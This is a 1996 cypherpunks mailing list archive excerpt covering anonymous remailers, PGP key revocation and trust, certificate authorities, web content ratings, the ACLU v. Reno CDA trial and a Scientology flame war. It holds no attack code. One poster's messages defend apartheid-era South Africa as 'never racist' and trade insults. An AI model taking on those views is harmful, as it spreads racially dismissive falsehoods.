opinions expressed within are not necessarily my own or anyone elses..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 13:39:21 +0800
To: sameer@c2.org
Subject: Re: Remailer in a box
Message-ID: <01I4JS197RN48Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sameer@c2.org" 10-MAY-1996 06:48:23.53

>	Also useful for chaining purposes.

	Yes, for the cryptographic purposes. It doesn't make much difference on
the juristictional end of things - I'd need to locate a UNIX account in another
country for that. Hmm... possible.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sat, 11 May 1996 16:09:44 +0800
To: Tim Dierks <timd@consensus.com>
Subject: Re: PGP, Inc.
In-Reply-To: <v02140b03adb92b2dbc65@[205.149.165.24]>
Message-ID: <3193E226.575E651C@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Dierks wrote:
> 
> The only effort they make is that when using the email-based CA, it mails
> the certificate to the address within, so it's not trivial to get a cert
> for an address that you don't have access to. (I'm not saying it's
> impossible, or even hard, just that it requires some skill and effort).

For example, see http://www.digicrime.com/id.html . I believe they got
these certificates using the Web, rather than e-mail.

I think with e-mail, you'd actually have to be running a packet sniffer
or doing an active attack such as DNS spoofing. However, the Web is
much, much more convenient.

In any case, the page I referenced above is worthwhile reading.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 15:22:36 +0800
To: frissell@panix.com
Subject: Re: Remailer in a box
Message-ID: <01I4JSRBVRZQ8Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've been able to locate the following on the Web in regards to fax and
voicemail to Internet. The first is the one you were thinking of; the third was
mailed to me by a helpful individual (thanks).

http://www.faxweb.net/

	Allows 1/4 size web page looking, then download full via special
software for Windows. Not sure why demands special software to do the web
page - should be able to download normally then auto-delete (or charge more for
memory space usage). Email used for notification. Requires a credit card.

http://www.jfax.net/

	Emails you with a compressed file containing the fax. JFAX software
for Windows or Mac used to decompress it. Requires a credit card.

http://www.vix.com/hylafax/

	Software to enable fax reception and translation either into PostScript
or TIFF/S (sp?). This may be the most practical for anonymous use; can TIFF/S
and Postscript be easily translated into a jpg or gif file? Those are the
easiest viewers to locate.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 14:05:16 +0800
To: blancw@microsoft.com
Subject: Re: self-ratings vs. market ratings
Message-ID: <01I4JSVMGPKS8Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"blancw@MICROSOFT.com"  "Blanc Weber" 10-MAY-1996 16:21:20.63

>The more automated that filtering becomes, so that the viewer (be it an
>adult or a child) requires less and less personal involvement in
>evaluating what is appropriate (or even interesting) for themselves, the
>more weak & piddly (ignorant & psychologically dependent) those people
>could become, falling into the habit of having others - or an automatic
>robocop - do their content-filtering for them.   Not a good system to
>introduce into a dynamic world-order.  Like all automatic things, it can
>encourage intellectual lassitude.  Like all tools, this one can also be
>misemployed.

>But, of course, surfers can make a cultural decision:  sex&violence?  or
>namby-pamby? :>)

	A good point. Something to keep in mind with the CyberAngels' liking 
for ratings - remember "angels@wavenet.com"'s rantings about "elites"?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 13:46:55 +0800
To: sunder@dorsai.dorsai.org
Subject: Re: Transitive trust
Message-ID: <01I4JT3ZWQSI8Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sunder@dorsai.dorsai.org"  "Ray Arachelian" 10-MAY-1996 16:37:22.44

>But it is - it's a pain in the ass, but you can always revoke your own 
>key and generate a new one, then sign everyone's keys whom you've signed 
>as trusted, EXCEPT the one you wish to revoke.
 
	Well... that has the problem that all the signatures on your old key
won't transfer, so far as I know. Now, this may have the good effect of
decreasing the effective reputation of anyone who goofs and needs to revoke
a signature (and of causing people to check more carefully when first
signing)... but it's also a motivation not to check carefully _after_ the
first time (you might need to revoke it). This balance is also present about
other reasons to revoke a key - on the one hand, someone who frequently revokes
keys may not be keeping up with them very well, and thus should not be trusted.
On the other hand, it may be someone who changes them on a regular basis for
security (a reason to keep a master key to sign your key with & vice-versa,
then get signatures on it) or someone who is keeping a sharp eye out for
violations and will revoke a key whenever they suspect a problem.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: timd@consensus.com (Tim Dierks)
Date: Sat, 11 May 1996 15:59:37 +0800
To: djw@vplus.com
Subject: Re: PGP, Inc.
Message-ID: <v02140b01adb999c66a5d@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:48 PM 5/10/96, Dan Weinstein wrote:
>On Fri, 10 May 1996 10:22:24 -0700, timd@consensus.com wrote:
>>
>>The only effort they make is that when using the email-based CA, it mails
>>the certificate to the address within, so it's not trivial to get a cert
>>for an address that you don't have access to. (I'm not saying it's
>>impossible, or even hard, just that it requires some skill and effort).
>
>I don't believe this is correct.  They send you information after you
>have created the cert verifying that you set it up, but nothing
>requires a response and the key is transfered via http.

If you'll examine my message, you'll see I was referring to the email-based
S/MIME class 1 CA.

Best,
 - Tim Dierks

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 14:24:24 +0800
To: eli+@GS160.SP.CS.CMU.EDU
Subject: Re: Transitive trust and MLM
Message-ID: <01I4JTAAHSC88Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"eli+@GS160.SP.CS.CMU.EDU" 10-MAY-1996 17:48:49.87

>Each signature has an /a priori/ probability p of correctly indicating
>validity, but these probilities are not independent at all: this key
>isn't valid, period.  If one certifying signature is incorrect, all
>others on the same key must be, and vice versa -- about as correlated
>as they come.

	The different paths going through those different signatures will be
correlated/non-independent, yes.... but that isn't the problem unless you're
considering multiple paths (in a more complicated version).

>To limit transitivity, constrain the path length.  This limits key
>reachability too, but I think we agree that it's essential in the real
>world.  (It should also make the math simpler!)  The model generalizes
>to non-binary conceptions of trust, but I don't think these can
>rehabilitate transitivity.  Hmm, there are some possible approaches,
>though.

	IIRC, there have been some sociological studies showing that _everyone_
is linked through 6 or so people. Now, there's the question of whether you
_need_ to be linked to _everyone_ - just everyone with whom you want to do
business (e.g., excluding authoritarian types doing a sting). It does come back
to the elite vs masses distinction; I see nothing wrong (and am in favor of)
separation of the elite from the masses.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 11 May 1996 14:32:19 +0800
To: cypherpunks@toad.com
Subject: [hrdware] anti-Tempest video settings
Message-ID: <9605102331.AA09365@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi again.

Is there anybody that have any idea about a color setting that would 
make it more difficult to detect by a Tempest attack?
(I assume that Tempest cannot discriminate between various color guns 
and signals in the monitor...  Maybe I am completely wrong...)


Like, for example : 

background: G255 B0   R0
      text: G0   B255 R0

Theses colors are not that bad to look at.  I realize that Tempest is 
sensitive to actual electrical values rather than logical values.

Anybody has any idea about settings that could fool Tempest?

Crypto Relevancy:
I was writing a passphrase file to later be secsplitted and I suddenly got 
all sweaty and nervous ...  :-)

Ciao all

JFA


 PGP key ID# C58ADD0D  at: http://w3.citenet.net/users/jf_avon
 Key Fingerprint: 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 11 May 1996 17:51:35 +0800
To: richieb@teleport.com (Rich Burroughs)
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <2.2.32.19960510171253.00760f44@mail.teleport.com>
Message-ID: <199605110128.SAA14287@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 07:15 PM 5/9/96 -0700, qut@netcom.com (Dave Harman) wrote:
> [snip]
> >Oh, in what way was Elrom racist? (he's not anti-asian or anti-semitic,
> >for instance)
> [snip]
> 
> Chris Owen has written an essay about Hubbard's support of the racist South
> African govt.  

Along with Israel, Reaganites, etc.  Racism?
Just capitali$m in it's international arena.

> http://www.demon.co.uk/castle/audit/aprtheid.html

Just skimmed through it.  Black scientologists should
read it.  More than ever, it points out how Elron
sought corrupt officials, to make deals with, 
subsequently praising them for their venality.

South Africa never was racist, but just cared
about diamonds and gold.  Cheap labor from
apartheid, akin to cheap labor from immigration.

> He quotes Hubbard as writing:
> 
> "Just as individuals can be seen by observing nations, so we see the African
> tribesman, with his complete contempt for truth and his emphasis on
> brutality and savagery for others but not himself, is a no-civilization." 

TRIBESMAN.  No doubt he would have a favorable
opinion of Idi Amin, Mugabe(sp), and any other
rich black, as long as they are willing to
part with some of their money.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Sat, 11 May 1996 14:59:38 +0800
To: cypherpunks@toad.com
Subject: Open Group issues first new Internet security standards
Message-ID: <199605102337.SAA14631@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri May 10 18:35:00 1996
Story at:

http://www.infoworld.com/cgi-bin/displayStory.pl?960510.opengroup.htm

Lou Zirko
Lou Zirko                                (502)383-2175
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMZPS9BKvccEAmlQ9AQF11Af+ICe2kFCFVo7oxTD6q5BTikFxlITSNwrS
q88PturM07k788l0CgHEXR+GV4dyNB24Xgi2ZViyfOPeTHuKtVmpdr9w3T46Lo8d
ixtuKWqpjY4W8n39LU8WlR6ULja43Qb9jPCal2AcXJALAdm/D72NVrr4ATwItYOI
KeibIIevzTj68Un1/sEmlEQik1sqmMdNvEr4M3ePBnEhvbgjl7gk8T/XBPVjHMes
0e/gLtTbQ5WzuzC/rmpyoMBR20KUp83wSq5F1OtNTv33rmwhF08ZJdH/InO+L006
oLOVdeqBh/eB3ae2dpV3aApQMa3QNpHTgL9D1sokfoXdMZYt+MxJgg==
=IfyX
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 11 May 1996 16:02:13 +0800
To: MOHAMED HABIB MOHAMED EUSOFF <cypherpunks@toad.com
Subject: Re: Dear friends,
Message-ID: <199605110149.SAA18276@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 5/10/96 +0800, MOHAMED HABIB MOHAMED EUSOFF wrote:
>I am searching for NETWORK SECURITY white paper, documents and hacking
>uitlities. Maybe you guys/gals can
>shed some light on this.

Wietse Venema and Dan farmer recomended RFC1244 in their Security Auditing
and Risk Analysis class.

Available from ftp:ftp://munnari.oz.au/rfc/rfc1244.Z


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 16:22:52 +0800
To: Dave <qut@netcom.com>
Subject: [Yadda Yadda Heil Dave] Re: remailer@utopia.hacktic.nl down
In-Reply-To: <199605100215.TAA04043@netcom16.netcom.com>
Message-ID: <Pine.GUL.3.93.960510190157.2815L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, Dave wrote:

> >     > Perhaps Co$ was behind the recent spamming of
> >     > alt.politics.white-power.  Scientology is 
> >     > virulently anti-racist.
> > 
> > Interesting, given that Massah Elron (L. Ron Hubbard) was virulently
> > racist.  
> 
> Just check out www.theta.com for examples of wiesenthalien anti-racism.

Also on www.theta.com find examples of Scientology's commitment to human
rights, free speech on the Internet, responsible business and medical
practices, and Freedom*. 

-rich
 http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html

 * - Freedom is a registered trademark of the Religious Technology Center





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 14:30:22 +0800
To: cypherpunks@toad.com
Subject: Clinton Administration against Internet Phone regulation
Message-ID: <01I4JV643L8G8Y5C3E@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Of course, there's the question of whether they'd have the same opinion
on services routing stuff from the Internet to phones & vice-versa. Still, it's
nice to see them having a bit of sense.
	-Allen


>White House: No Need To Regulate Voice software

>   WASHINGTON - The Clinton administration has recommended that the
>   Federal Communications Commission not regulate firms that sell
>   software that enables voice communications by users of the Internet.
   
>   The Commerce Department letter to FCC Chairman Reed Hundt was in

[...]

>   Larry Irving, head of the department's National Telecommunications and
>   Information Administration, argued that the software companies that
>   are the object of ACTA's petition provide no communications services,
>   but merely offer goods that enable individuals to engage in voice
>   communications.
   
>   Irving said those companies &quot;are no more providing
>   telecommunications services than are the vendors of the telephone
>   handsets, fax machines and other customer premises equipment that make
>   communications possible.&quot;
   
>   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 14:42:48 +0800
To: frissell@panix.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <01I4JVOF385S8Y5AN2@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 10-MAY-1996 19:11:58.23

>Such a list could be published openly in any case since discussing
>techniques of tax fraud is legal.  Even advocay would be legal in almost all
>cases.  (Since tax fraud is a non-violent crime, you don't have any of these
>'agitating an angry mob' scenarios.)  As long as you avoided conspiring with
>anyone, you can discuss techniques all you like.  Some *participants* might
>like to subscribe anonymously however.

	There are, however, some possible difficulties with this.
	A. If the Feds know about some scheme, they are more likely to be able
to thwart it. The extent to which this is true, of course, depends on the
method(s) being used.
	B. Sting operations.

	These are arguments for the list being closed in format, with some
form of security check. The major problem with this is that the security check 
will break the anonymnity of participants... you may not want to trust whoever
is doing the checking, even if they're public (as they should be for this).
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 11 May 1996 17:33:07 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Rich is leaving for thetapunks
In-Reply-To: <Pine.GUL.3.93.960510190157.2815L-100000@Networking.Stanford.EDU>
Message-ID: <199605110235.TAA21673@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Thu, 9 May 1996, Dave wrote:
> 
> > >     > Perhaps Co$ was behind the recent spamming of
> > >     > alt.politics.white-power.  Scientology is 
> > >     > virulently anti-racist.
> > > 
> > > Interesting, given that Massah Elron (L. Ron Hubbard) was virulently
> > > racist.  
> > 
> > Just check out www.theta.com for examples of wiesenthalien anti-racism.
> 
> Also on www.theta.com find examples of Scientology's commitment to human
> rights, free speech on the Internet, responsible business and medical
> practices, and Freedom*. 

What are you doing HERE when you obviously belong THERE?

> -rich
>  http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html
> 
>  * - Freedom is a registered trademark of the Religious Technology Center
> 
> 


-- 
		God grant me the serenity to accept
		the things I cannot change,
		the courage to change the things I can,
		and the wisdom to know the difference




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 16:47:44 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Are remailers designed to be knocked down?
In-Reply-To: <A92kx8m9L4fI085yn@netcom.com>
Message-ID: <Pine.GUL.3.93.960510195558.2815P-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 May 1996, Alan Bostick wrote:

> The Scientology wars are spilling over into alt.usenet.kooks again, and
> Keith Henson had this odd thing to say.  I thought Cypherpunk discussion
> of Keith's thesis would be interesting.
> 
> hkhenson@netcom.com (Keith Henson) wrote:
> > 
> > Ah, but the remailers are *designed* to be knocked down.  The
> > are not expected to last if they are being used for serious 
> > causes.  But the package for doing another one and getting it
> > hooked into the network is easy to install--even in a user
> > act.  Knocking out a remailer will usually halt the effort to
> > get back at the person/persons who were spilling the beans.
> > Social factors involved here.  If any of you would like to 
> > help, offer to run a remailer for a while.  Consider it a 
> > temporary civic duty.  Keith Henson

I think this is reasonable. I would HOPE that a remailer under heavy
attack would be able to shut down, publicly, before it was taken over by
the legal authorities or other armed thugs. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnson" <caj@tdrs.com>
Date: Sat, 11 May 1996 18:43:25 +0800
To: "Multiple recipients of list errors@snyside.sunnyside.com>
Subject: cr> ACLU v. RENO: Trial Update 5/10/96
Message-ID: <1101788478546.LTK.023@cpsr.org>
MIME-Version: 1.0
Content-Type: text/plain


This just in from the ACLU!  I was in Philly today folks, and I can 
tell you, the update below is an understatement; it was a rout!  The 
ACLU and the ALA, with ample help from the judges and Government 
counsel, literally pulled the legs off the Government case!

I'll be posting my own version on this by Monday. Suddenly, there is 
a new light in cyberspace!  

Craig

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

ACLU V. RENO: TRIAL UPDATE

AT CLOSING ARGUMENTS, ACLU CALLS ON COURT
TO PROTECT FREE SPEECH IN CYBERSPACE


FOR IMMEDIATE RELEASE
                                                Contact: Emily
                                                Whitfield
Friday, May 10, 1996

212-944 -9800, x426

emilyaclu@aol.com

PHILADELPHIA-- A three-judge panel heard closing arguments today
regarding a  law that would criminalize free speech in cyberspace. 
Plaintiffs and defendants each had approximately two hours to make
their case and answer questions from the judges.  

Much of the government's argument today hinged on a proposal
requiring Internet users to identify so-called indecent or patently
offensive words or images with an electronic"tag."   But by the end
of the day, government lawyers conceded -- under pointed questioning
from the judges -- that it would be impossible to implement this
scheme given the technology currently available.

That concession alone, the ACLU said, could justify granting
plaintiff's motion for a preliminary injunction against the
censorship provisions of the Communications Decency Act, which
criminalizes making available to minors "indecent" or "patently
offensive" speech online.  

"It's about time that the government conceded what the cyberspace
community has known all along -- that this is an unworkable law,"
said Christopher Hansen, who presented oral arguments for the ACLU. 
"And even if it were feasible, it is constitutionally unthinkable to
give the government the power to restrict valuable speech, or to
compel people to pejoratively label their speech." 

Government lawyers also acknowledged today that the law criminalizes
speech of value -- e.g.,  artistic, literary or medical information
-- not just "pornography" or other prurient words or images that
aren't covered under existing obscenity laws.  In fact, as Hansen
pointed out to the Court, Congress made sure that the Communications
Decency Act applied specifically to libraries and educational
institutions, and rejected several opportunities to make any
exceptions for valuable speech.

Such an omission might have been a "legislative craftsmanship
problem," suggested Anthony Coppolino, one of the lawyers appearing
for the Department of Justice.  But that argument was met with
skepticism from the judges.

"The government is basically saying eetrust me' when it comes to
determining what kind of online words and images will be considered
eeindecent' or eepatently offensive,'" said Marjorie Heins, a lawyer 
on the ACLU v. Reno team.  "But they were not able to offer a
coherent explanation as to what those terms mean." 

The risk involved to individuals in making such a determination is
especially grave when criminal penalties are involved, the ACLU
emphasized.  The CDA provides for penalties of up to two years in
jail and $250,000 in fines.   

Addressing this issue, Judge Stewart Dalzell asked the government
how it would view an individual such as ACLU plaintiff  Kiyoshi
Kuromiya, who has vowed to maintain his website no matter what. 
Kuromiya has testified that his website, the Critical Path AIDS
Project, provides "lifesaving" information on safer sex practices --
some of it necessary sexually explicit --  aimed at reaching teens
around the world.    Justice Department lawyer Jason Baron responded
that if Mr. Kuromiya didn't want to comply, "he can take the
consequences."

Overall, the ACLU said, plaintiffs succeeded in making three
essential points to the court:

--  The Communications Decency Act is a criminal statute with criminal
penalties. 

--  The law is aimed specifically at speech that is constitutionally
protected.

--  The government's  tagging scheme would force every American to
censor him/herself to avoid risk of criminal prosecution. 

Plaintiffs also reminded the Court that the censorship law applies not
only to websites, but to newsgroups, chat rooms, mail exploders, and
other fora that constitute a vital part of the Internet.  The ACLU has
asserted in its brief -- and the government largely conceded today --
that various schemes for self-censorship would be unworkable in these
environments as well.

At the conclusion of today's proceedings, Chief Judge Dolores K.
Sloviter said that the Court would issue a  ruling "in due course." 
Under expedited provisions, any appeal on rulings regarding the new
censorship law will be made directly to the U.S. Supreme Court.

ACLU v. Reno, which was filed the day the Communications Decency Act
was signed into law, was consolidated on February 26 with a second
case brought by the American Library Association and 26 co-plaintiffs,
known as the Citizens Internet Empowerment Coalition.  

Lawyers for the ACLU appearing before the judges are Christopher
Hansen, Marjorie Heins, Ann Beeson, and Stefan Presser, legal director
of the ACLU of Pennsylvania.  Attorney Bruce J. Ennis presented oral
arguments today on behalf of the ALA/CIEC coalition. 

-end- 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
   ~ CYBER-RIGHTS ~
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-
Visit The Cyber-Rights Library,  accessible via FTP or WWW at:

ftp://www.cpsr.org/cpsr/nii/cyber-rights/Library/
http://www.cpsr.org/cpsr/nii/cyber-rights/Library/

You are encouraged to forward and cross-post list traffic,
pursuant to any contained copyright & redistribution restrictions.

~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 17:38:35 +0800
To: Thetapunks <cypherpunks@toad.com>
Subject: [Yadda Yadda Heil Dave] Re: Rich is leaving for thetapunks
In-Reply-To: <199605110235.TAA21673@netcom6.netcom.com>
Message-ID: <Pine.GUL.3.93.960510195953.2815Q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


If I didn't know him better, I'd have thought that Dave had entirely
missed my sarcasm. Thanks for the laugh, Skippy! 

-rich
 FUCKING SCIENTOLOGIST*

 * - FUCKING SCIENTOLOGIST is a registered trademark of the Religious
     Technology Center

On Fri, 10 May 1996, Dave Harman wrote:

> > On Thu, 9 May 1996, Dave wrote:
> > 
> > > >     > Perhaps Co$ was behind the recent spamming of
> > > >     > alt.politics.white-power.  Scientology is 
> > > >     > virulently anti-racist.
> > > > 
> > > > Interesting, given that Massah Elron (L. Ron Hubbard) was virulently
> > > > racist.  
> > > 
> > > Just check out www.theta.com for examples of wiesenthalien anti-racism.
> > 
> > Also on www.theta.com find examples of Scientology's commitment to human
> > rights, free speech on the Internet, responsible business and medical
> > practices, and Freedom*. 
> 
> What are you doing HERE when you obviously belong THERE?
> 
> > -rich
> >  http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html
> > 
> >  * - Freedom is a registered trademark of the Religious Technology Center
> 
> -- 
> 		God grant me the serenity to accept
> 		the things I cannot change,
> 		the courage to change the things I can,
> 		and the wisdom to know the difference





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 11 May 1996 15:30:28 +0800
To: Andre Bacard <abacard@well.com>
Subject: Re: Bill Frantz, Churchill Club, Privacy
In-Reply-To: <199605102242.PAA06840@well.com>
Message-ID: <199605110022.UAA04819@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andre Bacard writes:
> It's worth noting that "privacy" and "security" -- in the practical Big
> Brother and corporate worlds -- are often opposites. In many instances, 
> (personal) "privacy" shields individuals from organizations; whereas,
> "security" protects organizations from individuals. For example, when a
> corporation proudly announces that it has installed greater "security,"
> it invariably means that the corporation has stepped up ways to spy upon
> employees.

I would say this is very much untrue in the computer world.

Security implies things like encrypting links, using cryptographic
authentication of logins, installing firewalls, etc. -- not mass
employee surveillance.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 11 May 1996 19:21:44 +0800
To: "Joseph M. Reagle Jr." <reagle@mit.edu>
Subject: Re: Mandatory Voluntary Self-Ratings
In-Reply-To: <9605092113.AA13795@rpcp.mit.edu>
Message-ID: <199605110408.VAA08516@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JR
>        In fact, 3rd party services may have problems with large and dynamic
>WEB sites (in which case they just might rate it high, and rate the whole
>directory.) (I was thinking about this with regards to incorporating rating
>systems into WEB site managements tools and apps...) If MICS and signatures
>do become prevalent, an easy way I can defeat ratings I don't like (or to
>keep from others rating me) is to repeatedly change my content in some
>simple way, throwing off their MICS.

the idea with the rating system is that the rating signs the signature
of the page, which is itself digitally hashed or something. in other
words, the rating is on the "state" of a page at some time. the system
would at least be able to detect a change in the state of a page,
and inform the user that a rating may no longer be valid due to obsolescence.
but you are correct that page changes are probably more problematic
for market ratings than self-ratings.

it is true that BOTH self-ratings and market ratings have major problems
associated with them. the question is, which has the fewest for a given
situation? if page designers are going to maliciously misuse rating
systems, then the market type system is superior. the market system
does suffer from the problem that it is less decentralized. however
it is possible that some rating services might be able
to economically justify entire armies of rating teams.

it is clear some key questions about ratings are as follows:

1. what pressure or coercion, if any, will be placed on page 
designers and by whom for certain self-ratings?

2. will self-ratings be deliberately misused by people protesting the
system? will it be a problem?

3. will page revisions make market ratings unviable?

all of these will become more apparent as implementatoins proliferate
more widely.

again, PICS supports both in theory, so I have no objections to PICS
and am fact have been supporting it here.

I suggest that we let the market decide which works better-- market
ratings or self-ratings. I suspect they will both coexist in the future.
trying to a priori argue which will be more problematic seems a bit
naive to me. market ratings might make more sense on more formal pages,
such as reference material that is likely to be steady over time.
self-ratings would be a good fallback if no other information is
available.

as far as page changes, I don't think the web has a good mechanism
for handling changes in its contents right now. improved methods
of handling this kind of thing in the future may make the rating
problem less difficult. for example, if there was a "systemized"
way that a web page could point to a new address it has relocated
to, so that everyone that runs their "checker" programs and hits
the old page would update the link, etc., this could be incorporated
into the rating system to handle one common kind of change.

another possibility is for people to put in information into their
pages about expected "shelf-life"-- this would help ratings agencies
avoid rating places that are not stable.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 11 May 1996 17:56:17 +0800
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: self-ratings vs. market ratings
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960510012559Z-23475@abash1.microsoft.com>
Message-ID: <199605110413.VAA08876@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I meant that the the *ratings* would not be very useful for my purposes
>(at least, not the ratings as I've heard proposed so far.)   I probably
>wouldn't have the same values or concerns of those who feel the need to
>apply them; I wouldn't judge the material by the same standards (raters
>are looking principally to create a means to censor material, and I
>myself am not concerned about passive text&graphics. 

one point about the ratings systems is that they are not simply for
rejecting or approving pages. they might be used to point out "neat
places". now, have you ever gone through a list of "cool links"
anywhere in cyberspace? I suspect such lists are very likely going
to be kept on rating servers in the not-to-distant future.  PICS
is a very flexible architecture and I hope it will be used in many
ingenious ways not previously foreseen.

also, keep in mind that in the short term, ratings refer to web
pages, but in the long term future, I can see them rating all kinds
of other things in cyberspace and the real world. again, PICS supports
this right off the bat. it is not constrained to web pages.

>The more automated that filtering becomes, so that the viewer (be it an
>adult or a child) requires less and less personal involvement in
>evaluating what is appropriate (or even interesting) for themselves, the
>more weak & piddly (ignorant & psychologically dependent) those people
>could become, falling into the habit of having others - or an automatic
>robocop - do their content-filtering for them.

but in a sense, this is what you do whenever you read a book or a
newspaper. you are reading information screened by someone else.
not so much with books that are unique, but you can see how this
applies with like a collection of essays for example. but I agree
with your implications. ratings are not a substitute for personal
judgement. they are meant to be a method to aid thinking, not
to replace it, imho.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 11 May 1996 19:18:42 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Mandatory Voluntary Self-Ratings
In-Reply-To: <01I4ILRRY69S8Y5AJT@mbcl.rutgers.edu>
Message-ID: <199605110420.VAA27663@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[ratings]
> For a market-driven system to emerge, we're going to
>have to have one or both of two things:
>	A. Raters being paid by the people who post web pages. Not likely.
>	B. Raters being paid by the people who get the ratings. More likely.
>Neither the RSAC or SafeSurf systems does either of these.
>	-Allen

